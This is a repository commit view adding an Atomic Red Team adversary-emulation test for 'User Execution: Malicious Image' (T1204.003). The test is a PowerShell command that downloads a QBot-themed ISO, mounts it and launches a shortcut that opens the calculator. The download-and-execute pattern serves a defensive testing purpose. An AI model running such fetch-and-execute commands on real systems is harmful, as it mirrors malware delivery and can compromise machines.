security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1204.003 (#2410)

Browse Source 
Co-authored-by: Shankar <mshank@NTI.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Mohana Shankar D
2023-04-27 19:52:56 +05:30
committed by GitHub
parent 7b710ceab5
commit 0061d9fd8c
2 changed files with 21 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1204.003/T1204.003.yaml
+21
View File
@@ -0,0 +1,21 @@
attack_technique: T1204.003
display_name: "User Execution: Malicious Image"
atomic_tests:
- name: Malicious Execution from Mounted ISO Image
description: Adversaries may rely on a user running a malicious image to facilitate execution
supported_platforms:
- windows
executor:
command: |-
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso"
$mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter
$finalpath = $mountedpath + ":\"
cd $finalpath
.\calc.exe.lnk
cleanup_command: |-
start-sleep -s 5
stop-process -Name "Calculatorapp" -Force
dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso"
name: powershell
elevation_required: true
atomics/T1204.003/src/qbot-test.iso
BIN
View File
Binary file not shown.